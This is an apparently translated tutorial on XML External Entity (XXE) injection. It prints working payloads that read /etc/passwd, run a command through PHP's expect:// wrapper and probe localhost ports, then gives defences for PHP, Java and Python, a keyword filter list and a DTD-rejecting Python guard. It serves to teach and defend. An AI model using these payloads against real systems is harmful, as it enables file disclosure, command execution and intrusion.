Introduction to the XML Entity Injection Vulnerability

XML Entity Injection (XXE)

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

The XML 1.0 standard defines the structure of an XML document. The standard defines a concept called an entity, which is a storage unit of some type. There are a few different types of entities; one of them, the external general/parameter parsed entity (often shortened to external entity), can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI that can be dereferenced (accessed) by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information normally not accessible by the application. Similar attack vectors apply to the usage of external DTDs, external stylesheets, external schemas, etc. which, when included, allow similar external resource inclusion style attacks.

 

OWASP

XXE can be used to:

  • Read any file
  • Execute system commands
  • Probe network ports
  • Attack intranet sites

Read any file

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

Execute system commands

In a PHP environment with the expect extension installed, system commands can be executed; other protocols may also allow system commands to be executed.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root>
<name>&xxe;</name>
</root>

Probe intranet ports

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]>
<root>
<name>&xxe;</name>
</root>

Attack intranet sites

XXE can be combined with other vulnerabilities, such as those in Struts2.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]>
<root>
<name>&xxe;</name>
</root>

Exploit

When external entities are allowed, maliciously constructed content can lead to reading any file, executing system commands, probing internal network ports, attacking intranet sites, and other hazards.

[Figure: protocols supported by default]

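Defending against XXE attacks

  • Use the method your development language provides for disabling external entities
    PHP:
    // Deprecated as of PHP 8.0; libxml 2.9.0 and later do not load external entities by default
    libxml_disable_entity_loader(true);
    JAVA:
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    dbf.setExpandEntityReferences(false);
    // setExpandEntityReferences(false) alone still lets the DTD be processed; reject DOCTYPE outright
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    Python:
    from lxml import etree
    xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities=False))
  • Filter the XML data submitted by users
    Keywords: <!DOCTYPE and <!ENTITY, or SYSTEM and PUBLIC.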
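
A stricter form of the filtering step above, as an added example that is not part of the original article: instead of matching keywords in the raw text, it lets Python's standard-library expat parser report any DOCTYPE or entity declaration and rejects the document before it is parsed for use. The names check_no_dtd, parse_untrusted and DTDForbidden and the sample documents are constructed for illustration.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Submitted XML contains a DOCTYPE or entity declaration."""


def check_no_dtd(xml_bytes: bytes) -> None:
    """Raise DTDForbidden if the document declares a DTD or any entity."""
    # The handlers fire inside the parser, so the check sees a declaration
    # however it is spaced or encoded. Malformed input raises ExpatError.
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} rejected")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise DTDForbidden(f"ENTITY {name!r} rejected")

    def on_external_ref(context, base, sysid, pubid):
        raise DTDForbidden(f"external entity {sysid!r} rejected")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_bytes, True)


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse only after the document is known to carry no DTD."""
    check_no_dtd(xml_bytes)
    return ET.fromstring(xml_bytes)


# Constructed sample inputs: a benign document and the page's file-read payload.
BENIGN = b'<?xml version="1.0" encoding="utf-8"?><root><name>alice</name></root>'
PAGE_PAYLOAD = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root><name>&xxe;</name></root>"""

if __name__ == "__main__":
    print(parse_untrusted(BENIGN).find("name").text)
    try:
        parse_untrusted(PAGE_PAYLOAD)
    except DTDForbidden as exc:
        print("rejected:", exc)
```

Applications that must accept a DOCTYPE cannot use this guard as written and should rely on the parser-level settings listed above instead.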